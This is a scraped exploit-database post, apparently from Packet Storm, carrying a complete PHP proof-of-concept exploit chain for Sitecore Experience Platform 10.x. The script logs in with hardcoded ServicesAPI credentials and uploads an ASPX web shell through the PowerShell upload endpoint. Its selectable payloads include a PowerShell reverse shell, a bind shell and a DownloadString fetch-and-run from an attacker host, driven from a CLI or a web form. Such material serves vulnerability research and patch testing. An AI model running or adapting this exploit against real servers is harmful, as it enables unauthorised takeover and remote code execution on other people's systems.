{"id":41638,"date":"2026-02-19T10:38:13","date_gmt":"2026-02-19T10:38:13","guid":{"rendered":"http:\/\/localhost\/?p=41638"},"modified":"2026-02-19T10:38:13","modified_gmt":"2026-02-19T10:38:13","slug":"sitecore-experience-manager-experience-platform-101-shell-upload-hardcoded-credentials","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41638","title":{"rendered":"\ud83d\udcc4 Sitecore Experience Manager \/ Experience Platform 10.1 Shell Upload \/ Hardcoded Credentials_PACKETSTORM:215879"},"content":{"rendered":"

{“lastseen”:”2026-02-19T16:30:53″,”description”:”Proof of concept exploit for a remote code execution vulnerability chain affecting Sitecore Experience Platform versions 10.x combining hardcoded credentials with file upload vulnerabilities for complete system compromise…”,”published”:”2026-02-19T00:00:00″,”modified”:”2026-02-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sitecore Experience Manager \/ Experience Platform 10.1 Shell Upload \/ Hardcoded Credentials”,”source”:””,”references”:””,”id”:”PACKETSTORM:215879″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-34509″,”CVE-2025-34511″],”sourceData”:”=============================================================================================================================================\\n | # Title : Sitecore Experience Manager (XM) and Experience Platform (XP) v 10.1 File Upload \\u0026 Hardcoded Credentials |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.sitecore.com\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : \\n \\n Critical Remote Code Execution vulnerability chain affecting Sitecore Experience Platform versions 10.0.0 through 10.4.x\\n \\t\\t\\t combining hardcoded credentials with file upload vulnerabilities for complete system compromise.\\n \\n [+] POC : \\n \\n php poc.php or http:\/\/127.0.0.1\/poc.php \\n \\n \\u003c?php\\n \\n class SitecoreXPExploit {\\n private $target;\\n private $port;\\n private $ssl;\\n private $base_path;\\n private $timeout;\\n private $cookies;\\n private $is_logged;\\n private $is_elevated;\\n private $webshell;\\n private $item_uri;\\n \\n public function __construct($target, $port = 443, $ssl = true, $base_path = ‘\/’) {\\n $this-\\u003etarget = $target;\\n $this-\\u003eport = $port;\\n $this-\\u003essl = $ssl;\\n $this-\\u003ebase_path = rtrim($base_path, ‘\/’);\\n $this-\\u003etimeout = 30;\\n $this-\\u003ecookies = [];\\n $this-\\u003eis_logged = false;\\n $this-\\u003eis_elevated = false;\\n $this-\\u003ewebshell = null;\\n $this-\\u003eitem_uri = null;\\n }\\n \\n public function check() {\\n echo \\”[*] Checking Sitecore XP vulnerability…\\\\n\\”;\\n \\n if (!$this-\\u003elogin_identitysrv(‘ServicesAPI’, ‘b’)) {\\n echo \\”[-] Could not log in, application might not be Sitecore\\\\n\\”;\\n return \\”unknown\\”;\\n }\\n \\n $this-\\u003eis_logged = true;\\n echo \\”[+] Successfully logged in with hardcoded credentials\\\\n\\”;\\n \\n if (!$this-\\u003eget_identity_cookies()) {\\n echo \\”[-] Could not get elevated cookies\\\\n\\”;\\n return \\”safe\\”;\\n }\\n \\n $this-\\u003eis_elevated = true;\\n echo \\”[+] Obtained elevated cookies\\\\n\\”;\\n \\n $res = $this-\\u003esend_request(\\n ‘\/sitecore%20modules\/Shell\/PowerShell\/UploadFile\/PowerShellUploadFile2.aspx’,\\n ‘GET’,\\n [‘hdl’ =\\u003e ‘1245516121’]\\n );\\n \\n if (!$res || $res[‘code’] != 200) {\\n echo \\”[-] PowerShell extension not detected\\\\n\\”;\\n return \\”safe\\”;\\n }\\n \\n echo \\”[+] \u2713 PowerShell extension detected – target is vulnerable\\\\n\\”;\\n \\n $version = $this-\\u003eget_version();\\n if ($version) {\\n echo \\”[+] Sitecore version: $version\\\\n\\”;\\n }\\n \\n return \\”vulnerable\\”;\\n }\\n \\n private function login_identitysrv($username, $password) {\\n $login_data = [\\n ‘username’ =\\u003e $username,\\n ‘password’ =\\u003e $password,\\n ‘grant_type’ =\\u003e ‘password’,\\n ‘scope’ =\\u003e ‘openid profile sitecore.profile api offline_access’,\\n ‘client_id’ =\\u003e ‘SitecoreShell’,\\n ‘client_secret’ =\\u003e ‘secret’\\n ];\\n \\n $res = $this-\\u003esend_request(\\n ‘\/identity\/connect\/token’,\\n ‘POST’,\\n [],\\n http_build_query($login_data),\\n [‘Content-Type: application\/x-www-form-urlencoded’]\\n );\\n \\n if ($res \\u0026\\u0026 $res[‘code’] == 200) {\\n $json = json_decode($res[‘body’], true);\\n if (isset($json[‘access_token’])) {\\n $this-\\u003ecookies[‘access_token’] = $json[‘access_token’];\\n return true;\\n }\\n }\\n \\n return false;\\n }\\n \\n private function get_identity_cookies() {\\n $headers = [\\n ‘Authorization: Bearer ‘ . $this-\\u003ecookies[‘access_token’]\\n ];\\n \\n $res = $this-\\u003esend_request(\\n ‘\/identity\/connect\/authorize’,\\n ‘GET’,\\n [\\n ‘client_id’ =\\u003e ‘SitecoreShell’,\\n ‘scope’ =\\u003e ‘openid profile sitecore.profile api offline_access’,\\n ‘response_type’ =\\u003e ‘code’,\\n ‘redirect_uri’ =\\u003e $this-\\u003ebuild_url(‘\/sitecore\/login?returnUrl=%2fsitecore’),\\n ‘state’ =\\u003e $this-\\u003erandom_text(10),\\n ‘nonce’ =\\u003e $this-\\u003erandom_text(10)\\n ],\\n null,\\n $headers\\n );\\n \\n if ($res \\u0026\\u0026 $res[‘code’] == 302) {\\n \\n if (preg_match_all(‘\/Set-Cookie:\\\\s*([^=]+)=([^;]+)\/i’, $res[‘headers’], $matches)) {\\n for ($i = 0; $i \\u003c count($matches[1]); $i++) {\\n $this-\\u003ecookies[$matches[1][$i]] = $matches[2][$i];\\n }\\n return true;\\n }\\n }\\n \\n return false;\\n }\\n \\n private function get_version() {\\n $res = $this-\\u003esend_request(‘\/sitecore’);\\n if ($res \\u0026\\u0026 $res[‘code’] == 200) {\\n \/\/ Try to extract version from page\\n if (preg_match(‘\/Sitecore\\\\s*([0-9]+\\\\.[0-9]+\\\\.[0-9]+)\/i’, $res[‘body’], $matches)) {\\n return $matches[1];\\n }\\n }\\n return \\”Unknown\\”;\\n }\\n \\n private function upload_webshell() {\\n $this-\\u003ewebshell = $this-\\u003erandom_text(15) . ‘.aspx’;\\n $this-\\u003eitem_uri = $this-\\u003erandom_text(8);\\n \\n $aspx_shell = $this-\\u003egenerate_aspx_shell();\\n \\n $boundary = ‘—-WebKitFormBoundary’ . $this-\\u003erandom_text(16);\\n \\n $data = \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”ItemUri\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”{$this-\\u003eitem_uri}\\\\r\\\\n\\”; \\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”LanguageName\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”en\\\\r\\\\n\\”; \\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”Overwrite\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”0\\\\r\\\\n\\”; \\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”Unpack\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”0\\\\r\\\\n\\”; \\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”Versioned\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”en\\\\r\\\\n\\”; \\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”{$this-\\u003eitem_uri}\\\\\\”; filename=\\\\\\”{$this-\\u003ewebshell}\\\\\\”\\\\r\\\\n\\”;\\n $data .= \\”Content-Type: text\/plain\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= $aspx_shell . \\”\\\\r\\\\n\\”;\\n \\n $data .= \\”–{$boundary}–\\\\r\\\\n\\”;\\n \\n $headers = [\\n \\”Content-Type: multipart\/form-data; boundary={$boundary}\\”,\\n \\”Content-Length: \\” . strlen($data)\\n ];\\n \\n $cookie_header = $this-\\u003ebuild_cookie_header();\\n if ($cookie_header) {\\n $headers[] = $cookie_header;\\n }\\n \\n $res = $this-\\u003esend_request(\\n ‘\/sitecore%20modules\/Shell\/PowerShell\/UploadFile\/PowerShellUploadFile2.aspx’,\\n ‘POST’,\\n [‘hdl’ =\\u003e ‘1245516121’],\\n $data,\\n $headers\\n );\\n \\n return $res \\u0026\\u0026 $res[‘code’] == 200;\\n }\\n \\n private function generate_aspx_shell($payload_type = ‘cmd’, $lhost = null, $lport = null) {\\n $command = $this-\\u003egenerate_payload($payload_type, $lhost, $lport);\\n \\n $aspx = ‘\\u003c%@ Page Language=\\”C#\\” %\\u003e’;\\n $aspx .= ‘\\u003c%@ Import Namespace=\\”System.Diagnostics\\” %\\u003e’;\\n $aspx .= ‘\\u003c%@ Import Namespace=\\”System.IO\\” %\\u003e’;\\n $aspx .= ‘\\u003cscript runat=\\”server\\”\\u003e’;\\n $aspx .= ‘void Page_Load(object sender, EventArgs e) {‘;\\n $aspx .= ‘ try {‘;\\n $aspx .= ‘ ProcessStartInfo psi = new ProcessStartInfo();’;\\n $aspx .= ‘ psi.FileName = \\”cmd.exe\\”;’;\\n $aspx .= ‘ psi.Arguments = \\”\/c ‘ . addslashes($command) . ‘\\”;’;\\n $aspx .= ‘ psi.RedirectStandardOutput = true;’;\\n $aspx .= ‘ psi.UseShellExecute = false;’;\\n $aspx .= ‘ Process p = Process.Start(psi);’;\\n $aspx .= ‘ string output = p.StandardOutput.ReadToEnd();’;\\n $aspx .= ‘ p.WaitForExit();’;\\n $aspx .= ‘ Response.Write(\\”\\u003cpre\\u003e\\” + Server.HtmlEncode(output) + \\”\\u003c\/pre\\u003e\\”);’;\\n $aspx .= ‘ } catch (Exception ex) {‘;\\n $aspx .= ‘ Response.Write(\\”Error: \\” + Server.HtmlEncode(ex.Message));’;\\n $aspx .= ‘ }’;\\n $aspx .= ‘}’;\\n $aspx .= ‘\\u003c\/script\\u003e’;\\n \\n return $aspx;\\n }\\n private function trigger_webshell() {\\n if (!$this-\\u003ewebshell || !$this-\\u003eitem_uri) {\\n return false;\\n }\\n \\n $res = $this-\\u003esend_request(\\n \\”\/sitecore%20modules\/Shell\/PowerShell\/UploadFile\/{$this-\\u003eitem_uri}\/{$this-\\u003ewebshell}\\”,\\n ‘GET’\\n );\\n \\n return $res !== false;\\n }\\n \\n public function exploit($payload_type = ‘cmd’, $lhost = null, $lport = null) {\\n echo \\”[*] Starting Sitecore XP exploitation…\\\\n\\”;\\n \\n if (!$this-\\u003eis_logged \\u0026\\u0026 !$this-\\u003elogin_identitysrv(‘ServicesAPI’, ‘b’)) {\\n echo \\”[-] Failed to log in with hardcoded credentials\\\\n\\”;\\n return false;\\n }\\n \\n $this-\\u003eis_logged = true;\\n echo \\”[+] Logged in successfully\\\\n\\”;\\n \\n if (!$this-\\u003eis_elevated \\u0026\\u0026 !$this-\\u003eget_identity_cookies()) {\\n echo \\”[-] Failed to get elevated cookies\\\\n\\”;\\n return false;\\n }\\n \\n $this-\\u003eis_elevated = true;\\n echo \\”[+] Obtained elevated cookies\\\\n\\”;\\n echo \\”[*] Uploading web shell…\\\\n\\”;\\n if (!$this-\\u003eupload_webshell()) {\\n echo \\”[-] Failed to upload web shell\\\\n\\”;\\n return false;\\n }\\n \\n echo \\”[+] Web shell uploaded: {$this-\\u003ewebshell}\\\\n\\”;\\n echo \\”[*] Triggering web shell execution…\\\\n\\”;\\n if ($this-\\u003etrigger_webshell()) {\\n echo \\”[+] \u2713 Web shell triggered successfully\\\\n\\”;\\n echo \\”[*] Check your listener for connection\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Failed to trigger web shell\\\\n\\”;\\n return false;\\n }\\n }\\n \\n private function generate_payload($type, $lhost, $lport) {\\n switch ($type) {\\n case ‘reverse_shell’:\\n if (!$lhost || !$lport) {\\n return ‘whoami \\u0026 hostname \\u0026 ipconfig’;\\n }\\n \\n return \\”powershell -nop -c \\\\\\”\\\\$client = New-Object System.Net.Sockets.TCPClient(‘{$lhost}’,{$lport});\\\\$stream = \\\\$client.GetStream();[byte[]]\\\\$bytes = 0..65535|%{0};\\\\$sendbytes = ([text.encoding]::ASCII).GetBytes(‘PS ‘ + (pwd).Path + ‘\\u003e ‘);\\\\$stream.Write(\\\\$sendbytes,0,\\\\$sendbytes.Length);while((\\\\$i = \\\\$stream.Read(\\\\$bytes, 0, \\\\$bytes.Length)) -ne 0){\\\\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\\\\$bytes,0, \\\\$i);\\\\$sendback = (iex \\\\$data 2\\u003e\\u00261 | Out-String );\\\\$sendback2 = \\\\$sendback + ‘PS ‘ + (pwd).Path + ‘\\u003e ‘;\\\\$sendbyte = ([text.encoding]::ASCII).GetBytes(\\\\$sendback2);\\\\$stream.Write(\\\\$sendbyte,0,\\\\$sendbyte.Length);}\\\\\\”\\”;\\n \\n case ‘bind_shell’:\\n if (!$lport) {\\n return ‘whoami \\u0026 hostname \\u0026 systeminfo’;\\n }\\n return \\”powershell -nop -c \\\\\\”\\\\$listener = New-Object System.Net.Sockets.TcpListener({$lport});\\\\$listener.Start();while(\\\\$true){\\\\$client = \\\\$listener.AcceptTcpClient();\\\\$stream = \\\\$client.GetStream();[byte[]]\\\\$bytes = 0..65535|%{0};\\\\$data = \\\\$stream.Read(\\\\$bytes, 0, \\\\$bytes.Length);\\\\$input = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\\\\$bytes,0, \\\\$data);\\\\$sendback = (iex \\\\$input 2\\u003e\\u00261 | Out-String );\\\\$sendback2 = \\\\$sendback + ‘PS ‘ + (pwd).Path + ‘\\u003e ‘;\\\\$sendbyte = ([text.encoding]::ASCII).GetBytes(\\\\$sendback2);\\\\$stream.Write(\\\\$sendbyte,0,\\\\$sendbyte.Length);}\\\\\\”\\”;\\n \\n case ‘meterpreter’:\\n if (!$lhost || !$lport) {\\n return ‘whoami \\u0026 hostname’;\\n }\\n \\n return \\”powershell -nop -c \\\\\\”IEX (New-Object Net.WebClient).DownloadString(‘http:\/\/{$lhost}:8080\/payload.ps1’)\\\\\\”\\”;\\n \\n case ‘cmd’:\\n default:\\n return ‘whoami \\u0026 hostname \\u0026 ipconfig \\u0026 dir C:\\\\\\\\’;\\n }\\n }\\n \\n private function send_request($path, $method = ‘GET’, $params = [], $data = null, $custom_headers = []) {\\n $url = $this-\\u003ebuild_url($path);\\n \\n if ($method == ‘GET’ \\u0026\\u0026 !empty($params)) {\\n $url .= ‘?’ . http_build_query($params);\\n }\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n CURLOPT_HEADER =\\u003e true,\\n CURLOPT_CUSTOMREQUEST =\\u003e $method,\\n CURLOPT_FOLLOWLOCATION =\\u003e false\\n ]);\\n \\n if ($method == ‘POST’ \\u0026\\u0026 $data) {\\n curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\\n }\\n \\n $headers = array_merge([\\n ‘User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n ], $custom_headers);\\n \\n $cookie_header = $this-\\u003ebuild_cookie_header();\\n if ($cookie_header) {\\n $headers[] = $cookie_header;\\n }\\n \\n curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($response) {\\n $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\\n $headers = substr($response, 0, $header_size);\\n $body = substr($response, $header_size);\\n \\n return [\\n ‘code’ =\\u003e $http_code,\\n ‘headers’ =\\u003e $headers,\\n ‘body’ =\\u003e $body\\n ];\\n }\\n \\n return false;\\n }\\n \\n private function build_cookie_header() {\\n if (empty($this-\\u003ecookies)) {\\n return null;\\n }\\n \\n $cookie_parts = [];\\n foreach ($this-\\u003ecookies as $name =\\u003e $value) {\\n $cookie_parts[] = \\”{$name}={$value}\\”;\\n }\\n \\n return ‘Cookie: ‘ . implode(‘; ‘, $cookie_parts);\\n }\\n \\n private function random_text($length = 8) {\\n $chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’;\\n $result = ”;\\n for ($i = 0; $i \\u003c $length; $i++) {\\n $result .= $chars[rand(0, strlen($chars) – 1)];\\n }\\n return $result;\\n }\\n \\n private function build_url($path) {\\n $protocol = $this-\\u003essl ? ‘https’ : ‘http’;\\n $full_path = $this-\\u003ebase_path . $path;\\n return \\”{$protocol}:\/\/{$this-\\u003etarget}:{$this-\\u003eport}{$full_path}\\”;\\n }\\n }\\n \\n if (php_sapi_name() === ‘cli’) {\\n echo \\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 Sitecore XP RCE Exploit \u2551\\n \u2551 CVE-2025-34511 \\u0026 CVE-2025-34509 \u2551\\n \u2551 PHP Implementation \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\n \\\\n\\”;\\n \\n $options = getopt(\\”t:p:s:u:c:P:L:H:\\”, [\\n \\”target:\\”,\\n \\”port:\\”,\\n \\”ssl\\”,\\n \\”uri:\\”,\\n \\”check\\”,\\n \\”payload:\\”,\\n \\”lhost:\\”,\\n \\”lport:\\”\\n ]);\\n \\n $target = $options[‘t’] ?? $options[‘target’] ?? null;\\n $port = $options[‘p’] ?? $options[‘port’] ?? 443;\\n $ssl = isset($options[‘s’]) || isset($options[‘ssl’]);\\n $base_uri = $options[‘u’] ?? $options[‘uri’] ?? ‘\/’;\\n $check_only = isset($options[‘c’]) || isset($options[‘check’]);\\n $payload_type = $options[‘P’] ?? $options[‘payload’] ?? ‘cmd’;\\n $lhost = $options[‘H’] ?? $options[‘lhost’] ?? null;\\n $lport = $options[‘L’] ?? $options[‘lport’] ?? 4444;\\n \\n if (!$target) {\\n echo \\”Usage: php sitecore_exploit.php [options]\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” -t, –target Target host (required)\\\\n\\”;\\n echo \\” -p, –port Target port (default: 443)\\\\n\\”;\\n echo \\” -s, –ssl Use SSL (default: true)\\\\n\\”;\\n echo \\” -u, –uri Base URI path (default: \/)\\\\n\\”;\\n echo \\” -c, –check Check only (don’t exploit)\\\\n\\”;\\n echo \\” -P, –payload Payload type: cmd, reverse_shell, bind_shell, meterpreter (default: cmd)\\\\n\\”;\\n echo \\” -H, –lhost Listener host for reverse shell\\\\n\\”;\\n echo \\” -L, –lport Listener port for reverse shell (default: 4444)\\\\n\\”;\\n echo \\”\\\\nExamples:\\\\n\\”;\\n echo \\” php sitecore_exploit.php -t 192.168.1.100 -c\\\\n\\”;\\n echo \\” php sitecore_exploit.php -t sitecore.company.com -P reverse_shell -H 10.0.0.5 -L 4444\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new SitecoreXPExploit($target, $port, $ssl, $base_uri);\\n \\n if ($check_only) {\\n $result = $exploit-\\u003echeck();\\n echo \\”\\\\n[*] Result: {$result}\\\\n\\”;\\n } else {\\n if ($exploit-\\u003eexploit($payload_type, $lhost, $lport)) {\\n echo \\”[+] Exploitation completed successfully\\\\n\\”;\\n } else {\\n echo \\”[-] Exploitation failed\\\\n\\”;\\n }\\n }\\n \\n } else {\\n \\n $action = $_POST[‘action’] ?? ”;\\n \\n if ($action === ‘check’ || $action === ‘exploit’) {\\n $target = $_POST[‘target’] ?? ”;\\n $port = $_POST[‘port’] ?? 443;\\n $ssl = isset($_POST[‘ssl’]);\\n $base_uri = $_POST[‘uri’] ?? ‘\/’;\\n $payload_type = $_POST[‘payload_type’] ?? ‘cmd’;\\n $lhost = $_POST[‘lhost’] ?? ”;\\n $lport = $_POST[‘lport’] ?? 4444;\\n \\n if (empty($target)) {\\n echo \\”\\u003cdiv style=’color: red; padding: 10px; border: 1px solid red; margin: 10px;’\\u003eTarget host is required\\u003c\/div\\u003e\\”;\\n } else {\\n $exploit = new SitecoreXPExploit($target, $port, $ssl, $base_uri);\\n \\n ob_start();\\n if ($action === ‘check’) {\\n $exploit-\\u003echeck();\\n } else {\\n $exploit-\\u003eexploit($payload_type, $lhost, $lport);\\n }\\n $output = ob_get_clean();\\n \\n echo \\”\\u003cpre style=’background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;’\\u003e$output\\u003c\/pre\\u003e\\”;\\n }\\n \\n echo ‘\\u003ca href=\\”‘ . htmlspecialchars($_SERVER[‘PHP_SELF’]) . ‘\\” style=\\”display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;\\”\\u003eBack to Form\\u003c\/a\\u003e’;\\n \\n } else {\\n echo ‘\\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eSitecore XP RCE Exploit\\u003c\/title\\u003e\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\n \\u003cstyle\\u003e\\n body { \\n font-family: Arial, sans-serif; \\n margin: 0; \\n padding: 20px; \\n background: #f5f5f5;\\n }\\n .container { \\n max-width: 800px; \\n margin: 0 auto; \\n background: white;\\n padding: 30px;\\n border-radius: 8px;\\n box-shadow: 0 2px 10px rgba(0,0,0,0.1);\\n }\\n h1 { \\n color: #333; \\n border-bottom: 2px solid #007cba;\\n padding-bottom: 10px;\\n }\\n h3 {\\n color: #666;\\n }\\n .form-group { \\n margin-bottom: 20px; \\n }\\n label { \\n display: block; \\n margin-bottom: 8px; \\n font-weight: bold;\\n color: #333;\\n }\\n input[type=\\”text\\”], select { \\n width: 100%; \\n padding: 10px; \\n border: 1px solid #ddd; \\n border-radius: 4px; \\n box-sizing: border-box;\\n font-size: 14px;\\n }\\n .checkbox-group {\\n display: flex;\\n align-items: center;\\n gap: 10px;\\n }\\n button { \\n background: #007cba; \\n color: white; \\n padding: 12px 25px; \\n border: none; \\n border-radius: 4px; \\n cursor: pointer; \\n margin-right: 10px;\\n font-size: 16px;\\n transition: background 0.3s;\\n }\\n button:hover {\\n background: #005a87;\\n }\\n .danger { \\n background: #dc3545; \\n }\\n .danger:hover {\\n background: #c82333;\\n }\\n .info { \\n background: #17a2b8; \\n }\\n .info:hover {\\n background: #138496;\\n }\\n .warning-box {\\n background: #fff3cd;\\n border: 1px solid #ffeaa7;\\n color: #856404;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n .info-box {\\n background: #d1ecf1;\\n border: 1px solid #bee5eb;\\n color: #0c5460;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003eSitecore XP RCE Exploit\\u003c\/h1\\u003e\\n \\u003ch3\\u003eCVE-2025-34511 \\u0026 CVE-2025-34509 – File Upload \\u0026 Hardcoded Credentials\\u003c\/h3\\u003e\\n \\n \\u003cdiv class=\\”warning-box\\”\\u003e\\n \\u003cstrong\\u003e Educational Use Only:\\u003c\/strong\\u003e This tool demonstrates critical vulnerabilities in Sitecore XP.\\n Use only on systems you own or have explicit permission to test.\\n \\u003c\/div\\u003e\\n \\n \\u003cform method=\\”post\\”\\u003e\\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”target\\”\\u003eTarget Host:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”target\\” name=\\”target\\” placeholder=\\”192.168.1.100 or sitecore.company.com\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”port\\”\\u003ePort:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”port\\” name=\\”port\\” value=\\”443\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”uri\\”\\u003eBase URI:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”uri\\” name=\\”uri\\” value=\\”\/\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003cdiv class=\\”checkbox-group\\”\\u003e\\n \\u003cinput type=\\”checkbox\\” id=\\”ssl\\” name=\\”ssl\\” checked\\u003e\\n \\u003clabel for=\\”ssl\\” style=\\”display: inline; font-weight: normal;\\”\\u003eUse SSL\\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”payload_type\\”\\u003ePayload Type:\\u003c\/label\\u003e\\n \\u003cselect id=\\”payload_type\\” name=\\”payload_type\\”\\u003e\\n \\u003coption value=\\”cmd\\”\\u003eTest Command\\u003c\/option\\u003e\\n \\u003coption value=\\”reverse_shell\\”\\u003eReverse Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”bind_shell\\”\\u003eBind Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”meterpreter\\”\\u003eMeterpreter\\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”lhost\\”\\u003eListener Host (for reverse shell):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”lhost\\” name=\\”lhost\\” placeholder=\\”Your IP address: 192.168.1.100\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”lport\\”\\u003eListener Port (for reverse shell):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”lport\\” name=\\”lport\\” value=\\”4444\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”check\\” class=\\”info\\”\\u003eCheck Vulnerability\\u003c\/button\\u003e\\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”exploit\\” class=\\”danger\\”\\u003eExecute Exploit\\u003c\/button\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cdiv class=\\”info-box\\”\\u003e\\n \\u003ch3\\u003eAbout the CVEs:\\u003c\/h3\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eCVE-2025-34509:\\u003c\/strong\\u003e Hardcoded credentials for ServicesAPI account (username: ServicesAPI, password: b)\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eCVE-2025-34511:\\u003c\/strong\\u003e File upload vulnerability in PowerShell extensions\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAffected Versions:\\u003c\/strong\\u003e Sitecore XP 10.0.0 to 10.4.x\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eImpact:\\u003c\/strong\\u003e Remote Code Execution via file upload\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eExploit Chain:\\u003c\/strong\\u003e Hardcoded Credentials \u2192 Authentication \u2192 File Upload \u2192 RCE\\u003c\/p\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e’;\\n }\\n }\\n ?\\u003e\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n 